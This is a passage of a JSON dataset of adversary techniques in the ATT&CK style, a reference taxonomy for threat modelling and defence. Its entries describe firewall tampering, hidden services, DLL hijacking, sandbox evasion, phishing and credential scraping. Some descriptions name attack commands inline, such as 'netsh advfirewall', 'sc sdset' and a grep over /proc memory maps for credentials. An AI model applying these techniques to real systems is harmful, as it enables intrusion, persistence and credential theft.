controls for Stealth.", "detection": ""}, {"attack_id": "T1542.005", "name": "TFTP Boot", "tactics": ["stealth", "persistence"], "platforms": ["Network Devices"], "description": "Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images. Adversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with Modify System Image to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to ROMMONkit and may result in the network device running a modified image.", "detection": ""}, {"attack_id": "T1686.003", "name": "Windows Host Firewall", "tactics": ["defense-impairment"], "platforms": ["Windows"], "description": "Adversaries may disable or modify the Windows host firewall to bypass controls limiting network usage. This can include disabling the Windows host firewall entirely, suppressing specific profiles (domain, private, public), or adding, deleting, and modifying firewall rules to allow or restrict traffic. Adversaries may perform these modifications through multiple mechanisms depending on the Windows operating system and access level. For example, adversaries may use command-line utilities (e.g., `netsh advfirewall` or PowerShell cmdlets like `Set-NetFirewallProfile`, `New-NetFirewallRule`), Windows Registry modifications (e.g., altering firewall states and rule configurations via registry keys), or the Windows Control Panel to modify firewall settings through the Windows Security interface. By disabling or modifying Windows firewall services, adversaries may enable access to remote services, open ports for command and control traffic, or configure rules for further actions.", "detection": ""}, {"attack_id": "T1543.003", "name": "Windows Service", "tactics": ["persistence", "privilege-escalation"], "platforms": ["Windows"], "description": "Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions. Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Adversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API. Adversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex: `.sys`) to disk, the payload can be loaded and registered via Native API functions such as `CreateServiceW()` (or manually via functions such as `ZwLoadDriver()` and `ZwSetValueKey()`), by creating the required service Registry values (i.e. Modify Registry), or by using command-line utilities such as `PnPUtil.exe`. Adversaries may leverage these drivers as Rootkits to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as \"Bring Your Own Vulnerable Driver\" (BYOVD)) as part of Exploitation for Privilege Escalation. Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through Service Execution. To make detection analysis more challenging, malicious services may also incorporate Masquerade Task or Service (ex: using a service and/or payload name related to a legitimate OS or benign software component). Adversaries may also create ‘hidden’ services (i.e., Hide Artifacts), for example by using the `sc sdset` command to set service permissions via the Service Descriptor Definition Language (SDDL). This may hide a Windows service from the view of standard service enumeration methods such as `Get-Service`, `sc query`, and `services.exe`.", "detection": ""}, {"attack_id": "T1568.001", "name": "Fast Flux DNS", "tactics": ["command-and-control"], "platforms": ["Linux", "macOS", "Windows", "ESXi"], "description": "Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record. The simplest, \"single-flux\" method, involves registering and de-registering an addresses as part of the DNS A (address) record list for a single DNS name. These registrations have a five-minute average lifespan, resulting in a constant shuffle of IP address resolution. In contrast, the \"double-flux\" method registers and de-registers an address as part of the DNS Name Server record list for the DNS zone, providing additional resilience for the connection. With double-flux additional hosts can act as a proxy to the C2 host, further insulating the true source of the C2 channel.", "detection": ""}, {"attack_id": "T1497.001", "name": "System Checks", "tactics": ["stealth", "discovery"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from Virtualization/Sandbox Evasion during automated discovery to shape follow-on behaviors. Specific checks will vary based on the target and/or adversary, but may involve behaviors such as Windows Management Instrumentation, PowerShell, System Information Discovery, and Query Registry to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment. Checks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. Once executed, malware may also use File and Directory Discovery to check if it was saved in a folder or file with unexpected or even analysis-related naming artifacts such as `malware`, `sample`, or `hash`. Other common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions. In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output. Hardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.", "detection": ""}, {"attack_id": "T1053.003", "name": "Cron", "tactics": ["execution", "persistence", "privilege-escalation"], "platforms": ["Linux", "macOS", "ESXi"], "description": "Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code. The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths. An adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for Persistence. In ESXi environments, cron jobs must be created directly via the crontab file (e.g., `/var/spool/cron/crontabs/root`).", "detection": ""}, {"attack_id": "T1069.002", "name": "Domain Groups", "tactics": ["discovery"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators. Commands such as net group /domain of the Net utility, dscacheutil -q group on macOS, and ldapsearch on Linux can list domain-level groups.", "detection": ""}, {"attack_id": "T1588.006", "name": "Vulnerabilities", "tactics": ["resource-development"], "platforms": ["PRE"], "description": "Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases. An adversary may monitor vulnerability disclosures/databases to understand the state of existing, as well as newly discovered, vulnerabilities. There is usually a delay between when a vulnerability is discovered and when it is made public. An adversary may target the systems of those known to conduct vulnerability research (including commercial vendors). Knowledge of a vulnerability may cause an adversary to search for an existing exploit (i.e. Exploits) or to attempt to develop one themselves (i.e. Exploits).", "detection": ""}, {"attack_id": "T1566.002", "name": "Spearphishing Link", "tactics": ["initial-access"], "platforms": ["Identity Provider", "Linux", "macOS", "Office Suite", "SaaS", "Windows"], "description": "Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging User Execution. The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly. Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an \"IDN homograph attack\"). URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an “@” symbol: for example, `hxxp://google.com@1157586937`. Adversaries may also utilize links to perform consent phishing/spearphishing campaigns to Steal Application Access Tokens that grant immediate access to the victim environment. For example, a user may be lured into granting adversaries permissions/access via a malicious OAuth 2.0 request URL that when accepted by the user provide permissions/access for malicious applications. These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls. Similarly, malicious links may also target device-based authorization, such as OAuth 2.0 device authorization grant flow which is typically used to authenticate devices without UIs/browsers. Known as “device code phishing,” an adversary may send a link that directs the victim to a malicious authorization page where the user is tricked into entering a code/credentials that produces a device token.", "detection": ""}, {"attack_id": "T1499.004", "name": "Application or System Exploitation", "tactics": ["impact"], "platforms": ["Windows", "IaaS", "Linux", "macOS"], "description": "Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent denial of service (DoS) condition. Adversaries may exploit known or zero-day vulnerabilities to crash applications and/or systems, which may also lead to dependent applications and/or systems to be in a DoS condition. Crashed or restarted applications or systems may also have other effects such as Data Destruction, Firmware Corruption, Service Stop etc. which may further cause a DoS condition and deny availability to critical information, applications and/or systems.", "detection": ""}, {"attack_id": "T1137", "name": "Office Application Startup", "tactics": ["persistence"], "platforms": ["Windows", "Office Suite"], "description": "Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins. A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page. These persistence mechanisms can work within Outlook or be used through Office 365.", "detection": ""}, {"attack_id": "T1218.004", "name": "InstallUtil", "tactics": ["stealth"], "platforms": ["Windows"], "description": "Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\\Windows\\Microsoft.NET\\Framework\\v\\InstallUtil.exe and C:\\Windows\\Microsoft.NET\\Framework64\\v\\InstallUtil.exe. InstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)].", "detection": ""}, {"attack_id": "T1598.003", "name": "Spearphishing Link", "tactics": ["reconnaissance"], "platforms": ["PRE"], "description": "Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: Establish Accounts or Compromise Accounts) and/or sending multiple, seemingly urgent messages. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. The given website may be a clone of a legitimate site (such as an online or corporate login portal) or may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an “@” symbol: for example, `hxxp://google.com@1157586937`. Adversaries may also embed “tracking pixels,” \"web bugs,\" or \"web beacons\" within phishing messages to verify the receipt of an email, while also potentially profiling and tracking victim information such as IP address. These mechanisms often appear as small images (typically one pixel in size) or otherwise obfuscated objects and are typically delivered as HTML code containing a link to a remote server. Adversaries may also be able to spoof a complete website using what is known as a \"browser-in-the-browser\" (BitB) attack. By generating a fake browser popup window with an HTML-based address bar that appears to contain a legitimate URL (such as an authentication portal), they may be able to prompt users to enter their credentials while bypassing typical URL verification methods. Adversaries can use phishing kits such as `EvilProxy` and `Evilginx2` to perform adversary-in-the-middle phishing by proxying the connection between the victim and the legitimate website. On a successful login, the victim is redirected to the legitimate website, while the adversary captures their session cookie (i.e., Steal Web Session Cookie) in addition to their username and password. This may enable the adversary to then bypass MFA via Web Session Cookie. Adversaries may also send a malicious link in the form of Quick Response (QR) Codes (also known as “quishing”). These links may direct a victim to a credential phishing page. By using a QR code, the URL may not be exposed in the email and may thus go undetected by most automated email security scans. These QR codes may be scanned by or delivered directly to a user’s mobile device (i.e., Phishing), which may be less secure in several relevant ways. For example, mobile users may not be able to notice minor differences between genuine and credential harvesting websites due to mobile’s smaller form factor. From the fake website, information is gathered in web forms and sent to the adversary. Adversaries may also use information from previous reconnaissance efforts (ex: Search Open Websites/Domains or Search Victim-Owned Websites) to craft persuasive and believable lures.", "detection": ""}, {"attack_id": "T1021.004", "name": "SSH", "tactics": ["lateral-movement"], "platforms": ["ESXi", "Linux", "macOS"], "description": "Adversaries may use Valid Accounts to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user. SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. On ESXi, SSH can be enabled either directly on the host (e.g., via `vim-cmd hostsvc/enable_ssh`) or via vCenter. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user (i.e., SSH Authorized Keys).", "detection": ""}, {"attack_id": "T1098.003", "name": "Additional Cloud Roles", "tactics": ["persistence", "privilege-escalation"], "platforms": ["IaaS", "Identity Provider", "Office Suite", "SaaS"], "description": "An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update IAM policies in cloud-based environments or add a new global administrator in Office 365 environments. With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins). This account modification may immediately follow Create Account or other malicious account activity. Adversaries may also modify existing Valid Accounts that they have compromised. This could lead to privilege escalation, particularly if the roles added allow for lateral movement to additional accounts. For example, in AWS environments, an adversary with appropriate permissions may be able to use the CreatePolicyVersion API to define a new version of an IAM policy or the AttachUserPolicy API to attach an IAM policy with additional or distinct permissions to a compromised user account. In some cases, adversaries may add roles to adversary-controlled accounts outside the victim cloud tenant. This allows these external accounts to perform actions inside the victim tenant without requiring the adversary to Create Account or modify a victim-owned account.", "detection": ""}, {"attack_id": "T1547.012", "name": "Print Processors", "tactics": ["persistence", "privilege-escalation"], "platforms": ["Windows"], "description": "Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, `spoolsv.exe`, during boot. Adversaries may abuse the print spooler service by adding print processors that load malicious DLLs at startup. A print processor can be installed through the AddPrintProcessor API call with an account that has SeLoadDriverPrivilege enabled. Alternatively, a print processor can be registered to the print spooler service by adding the HKLM\\SYSTEM\\\\[CurrentControlSet or ControlSet001]\\Control\\Print\\Environments\\\\[Windows architecture: e.g., Windows x64]\\Print Processors\\\\[user defined]\\Driver Registry key that points to the DLL. For the malicious print processor to be correctly installed, the payload must be located in the dedicated system print-processor directory, that can be found with the GetPrintProcessorDirectory API call, or referenced via a relative path from this directory. After the print processors are installed, the print spooler service, which starts during boot, must be restarted in order for them to run. The print spooler service runs under SYSTEM level permissions, therefore print processors installed by an adversary may run under elevated privileges.", "detection": ""}, {"attack_id": "T1566.001", "name": "Spearphishing Attachment", "tactics": ["initial-access"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon User Execution to gain execution. Spearphishing may also involve social engineering techniques, such as posing as a trusted source. There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.", "detection": ""}, {"attack_id": "T1027.008", "name": "Stripped Payloads", "tactics": ["stealth"], "platforms": ["Linux", "macOS", "Network Devices", "Windows"], "description": "Adversaries may attempt to make a payload difficult to analyze by removing symbols, strings, and other human readable information. Scripts and executables may contain variables names and other strings that help developers document code functionality. Symbols are often created by an operating system’s `linker` when executable payloads are compiled. Reverse engineers use these symbols and strings to analyze code and to identify functionality in payloads. Adversaries may use stripped payloads in order to make malware analysis more difficult. For example, compilers and other tools may provide features to remove or obfuscate strings and symbols. Adversaries have also used stripped payload formats, such as run-only AppleScripts, a compiled and stripped version of AppleScript, to evade detection and analysis. The lack of human-readable information may directly hinder detection and analysis of payloads.", "detection": ""}, {"attack_id": "T1559.001", "name": "Component Object Model", "tactics": ["execution"], "platforms": ["Windows"], "description": "Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE). Remote COM execution is facilitated by Remote Services such as Distributed Component Object Model (DCOM). Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and Visual Basic. Specific COM objects also exist to directly perform functions beyond code execution, such as creating a Scheduled Task/Job, fileless download/execution, and other adversary behaviors related to privilege escalation and persistence.", "detection": ""}, {"attack_id": "T1574.001", "name": "DLL", "tactics": ["stealth", "execution"], "platforms": ["Windows"], "description": "Adversaries may abuse dynamic-link library files (DLLs) in order to achieve persistence, escalate privileges, and evade defenses. DLLs are libraries that contain code and data that can be simultaneously utilized by multiple programs. While DLLs are not malicious by nature, they can be abused through mechanisms such as side-loading, hijacking search order, and phantom DLL hijacking. Specific ways DLLs are abused by adversaries include: ### DLL Sideloading Adversaries may execute their own malicious payloads by side-loading DLLs. Side-loading involves hijacking which DLL a program loads by planting and then invoking a legitimate application that executes their payload(s). Side-loading positions both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process. Adversaries may also side-load other packages, such as BPLs (Borland Package Library). Adversaries may chain DLL sideloading multiple times to fragment functionality hindering analysis. Adversaries using multiple DLL files can split the loader functions across different DLLs, with a main DLL loading the separated export functions. Spreading loader functions across multiple DLLs makes analysis harder, since all files must be collected to fully understand the malware’s behavior. Another method implements a “loader-for-a-loader”, where a malicious DLL’s sole role is to load a second DLL (or a chain of DLLs) that contain the real payload. ### DLL Search Order Hijacking Adversaries may execute their own malicious payloads by hijacking the search order that Windows uses to load DLLs. This search order is a sequence of special and standard search locations that a program checks when loading a DLL. An adversary can plant a trojan DLL in a directory that will be prioritized by the DLL search order over the location of a legitimate library. This will cause Windows to load the malicious DLL when it is called for by the victim program. ### DLL Redirection Adversaries may directly modify the search order via DLL redirection, which after being enabled (in the Registry or via the creation of a redirection file) may cause a program to load a DLL from a different location. ### Phantom DLL Hijacking Adversaries may leverage phantom DLL hijacking by targeting references to non-existent DLL files. They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module. ### DLL Substitution Adversaries may target existing, valid DLL files and substitute them with their own malicious DLLs, planting them with the same name and in the same location as the valid DLL file. Programs that fall victim to DLL hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace, evading defenses. Remote DLL hijacking can occur when a program sets its current directory to a remote location, such as a Web share, before loading a DLL. If a valid DLL is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation.", "detection": ""}, {"attack_id": "T1119", "name": "Automated Collection", "tactics": ["collection"], "platforms": ["IaaS", "Linux", "macOS", "Office Suite", "SaaS", "Windows"], "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a Command and Scripting Interpreter to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. In cloud-based environments, adversaries may also use cloud APIs, data pipelines, command line interfaces, or extract, transform, and load (ETL) services to automatically collect data. This functionality could also be built into remote access tools. This technique may incorporate use of other techniques such as File and Directory Discovery and Lateral Tool Transfer to identify and move files, as well as Cloud Service Dashboard and Cloud Storage Object Discovery to identify resources in cloud environments.", "detection": ""}, {"attack_id": "T1689", "name": "Downgrade Attack", "tactics": ["defense-impairment"], "platforms": ["macOS", "Windows", "Linux"], "description": "Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls. Downgrade attacks typically take advantage of a system’s backward compatibility to force it into less secure modes of operation. Adversaries may downgrade and use various less-secure versions of features of a system, such as Command and Scripting Interpreter or even network protocols that can be abused to enable Adversary-in-the-Middle or Network Sniffing. For example, PowerShell versions 5+ includes Script Block Logging (SBL), which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to impair defenses while running malicious scripts that may have otherwise been detected. Adversaries may similarly target network traffic to downgrade from an encrypted HTTPS connection to an unsecured HTTP connection that exposes network data in clear text. On Windows systems, adversaries may downgrade the boot manager to a vulnerable version that bypasses Secure Boot, granting the ability to disable various operating system security mechanisms.", "detection": ""}, {"attack_id": "T1115", "name": "Clipboard Data", "tactics": ["collection"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may collect data stored in the clipboard from users copying information within or between applications. For example, on Windows adversaries can access clipboard data by using clip.exe or Get-Clipboard. Additionally, adversaries may monitor then replace users’ clipboard with their data (e.g., Transmitted Data Manipulation). macOS and Linux also have commands, such as pbpaste, to grab clipboard contents.", "detection": ""}, {"attack_id": "T1003.007", "name": "Proc Filesystem", "tactics": ["credential-access"], "platforms": ["Linux"], "description": "Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc//maps` file shows how memory is mapped within the process’s virtual address space. And `/proc//mem`, exposed for debugging purposes, provides access to the process’s virtual address space. When executing with root privileges, adversaries can search these memory locations for all processes on a system that contain patterns indicative of credentials. Adversaries may use regex patterns, such as grep -E \"^[0-9a-f-]* r\" /proc/\"$pid\"/maps | cut -d' ' -f 1, to look for fixed strings in memory structures or cached hashes. When running without privileged access, processes can still view their own virtual memory locations. Some services or programs may save credentials in clear text inside the process’s memory. If running as or with the permissions of a web browser, a process can search the `/maps` & `/mem` locations for common website credential patterns (that can also be used to find adjacent memory within the same structure) in which hashes or cleartext credentials may be located.", "detection": ""}, {"attack_id": "T1583.005", "name": "Botnet", "tactics": ["resource-development"], "platforms": ["PRE"], "description": "Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks. Adversaries may purchase a subscription to use an existing botnet from a booter/stresser service. Internet-facing edge devices and related network appliances that are end-of-life (EOL) and unsupported by their manufacturers are commonly acquired for botnet activities. Adversaries may lease operational relay box (ORB) networks – consisting of virtual private servers (VPS), small office/home office (SOHO) routers, or Internet of Things (IoT) devices – to serve as a botnet. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale Phishing or Distributed Denial of Service (DDoS). Acquired botnets may also be used to support Command and Control activity, such as Hide Infrastructure through an established Proxy network.", "detection": ""}, {"attack_id": "T1555.005", "name": "Password Managers", "tactics": ["credential-access"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may acquire user credentials from third-party password managers. Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk. Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory. Adversaries may extract credentials from memory via Exploitation for Credential Access. Adversaries may also try brute forcing via Password Guessing to obtain the master password of a password manager.", "detection": ""}, {"attack_id": "T1553.001", "name": "Gatekeeper Bypass", "tactics": ["defense-impairment"], "platforms": ["macOS"], "description": "Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications. Based on an opt-in system, when files are downloaded an extended attribute (xattr) called `com.apple.quarantine` (also known as a quarantine flag) can be set on the file by the application performing the download. Launch Services opens the application in a suspended state. For first run applications with the quarantine flag set, Gatekeeper executes the following functions: 1. Checks extended attribute – Gatekeeper checks for the quarantine flag, then provides an alert prompt to the user to allow or deny execution. 2. Checks System Policies - Gatekeeper checks the system security policy, allowing execution of apps downloaded from either just the App Store or the App Store and identified developers. 3. Code Signing – Gatekeeper checks for a valid code signature from an Apple Developer ID. 4. Notarization - Using the `api.apple-cloudkit.com` API, Gatekeeper reaches out to Apple servers to verify or pull down the notarization ticket and ensure the ticket is not revoked. Users can override notarization, which will result in a prompt of executing an “unauthorized app” and the security policy will be modified. Adversaries can subvert one or multiple security controls within Gatekeeper checks through logic errors (e.g. Exploitation for Stealth), unchecked file types, and external libraries. For example, prior to macOS 13 Ventura, code signing and notarization checks were only conducted on first launch, allowing adversaries to write malicious executables to previously opened applications in order to bypass Gatekeeper security checks. Applications and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command may not set the quarantine flag. Additionally, it is possible to avoid setting the quarantine flag using Drive-by Compromise.", "detection": ""}, {"attack_id": "T1675", "name": "ESXi Administration Command", "tactics": ["execution"], "platforms": ["ESXi"], "description": "Adversaries may abuse ESXi administration services to execute commands on guest machines hosted within an ESXi virtual environment. Persistent background services on ESXi-hosted VMs, such as the VMware Tools Daemon Service, allow for remote management from the ESXi server. The tools daemon service runs as `vmtoolsd.exe` on Windows guest operating systems, `vmware-tools-daemon` on macOS, and `vmtoolsd ` on Linux. Adversaries may leverage a variety of tools to execute commands on ESXi-hosted VMs – for example, by using the vSphere Web Services SDK to programmatically execute commands and scripts via APIs such as `StartProgramInGuest`, `ListProcessesInGuest`, `ListFileInGuest`, and `InitiateFileTransferFromGuest`. This may enable follow-on behaviors on the guest VMs, such as File and Directory Discovery, Data from Local System, or OS Credential Dumping.", "detection": ""}, {"attack_id": "T1608.004", "name": "Drive-by Target", "tactics": ["resource-development"], "platforms": ["PRE"], "description": "Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in Drive-by Compromise. In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as Application Access Token. Prior to Drive-by Compromise, adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired (Acquire Infrastructure) or previously compromised (Compromise Infrastructure). Adversaries may upload or inject malicious web content, such as JavaScript, into websites. This may be done in a number of ways, including: * Inserting malicious scripts into web pages or other user controllable web content such as forum posts * Modifying script files served to websites from publicly writeable cloud storage buckets * Crafting malicious web advertisements and purchasing ad space on a website through legitimate ad providers (i.e., Malvertising) In addition to staging content to exploit a user's web browser, adversaries may also stage scripting content to profile the user's browser (as in Gather Victim Host Information) to ensure it is vulnerable prior to attempting exploitation. Websites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is referred to a strategic web compromise or watering hole attack. Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure (Domains) to help facilitate Drive-by Compromise.", "detection": ""}, {"attack_id": "T1007", "name": "System Service Discovery", "tactics": ["discovery"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as sc query, tasklist /svc, systemctl --type=service, and net start. Adversaries may also gather information about schedule tasks via commands such as `schtasks` on Windows or `crontab -l` on Linux and macOS. Adversaries may use the information from System Service Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.", "detection": ""}, {"attack_id": "T1040", "name": "Network Sniffing", "tactics": ["credential-access", "discovery"], "platforms": ["IaaS", "Linux", "macOS", "Network Devices", "Windows"], "description": "Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as Name Resolution Poisoning and SMB Relay, can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary. Network sniffing may reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Stealth activities. Adversaries may likely also utilize network sniffing during Adversary-in-the-Middle (AiTM) to passively gain additional knowledge about the environment. In cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to. Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic. The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic. On network devices, adversaries may perform network captures using Network Device CLI commands such as `monitor capture`.", "detection": ""}, {"attack_id": "T1553.002", "name": "Code Signing", "tactics": ["defense-impairment"], "platforms": ["macOS", "Windows"], "description": "Adversaries may 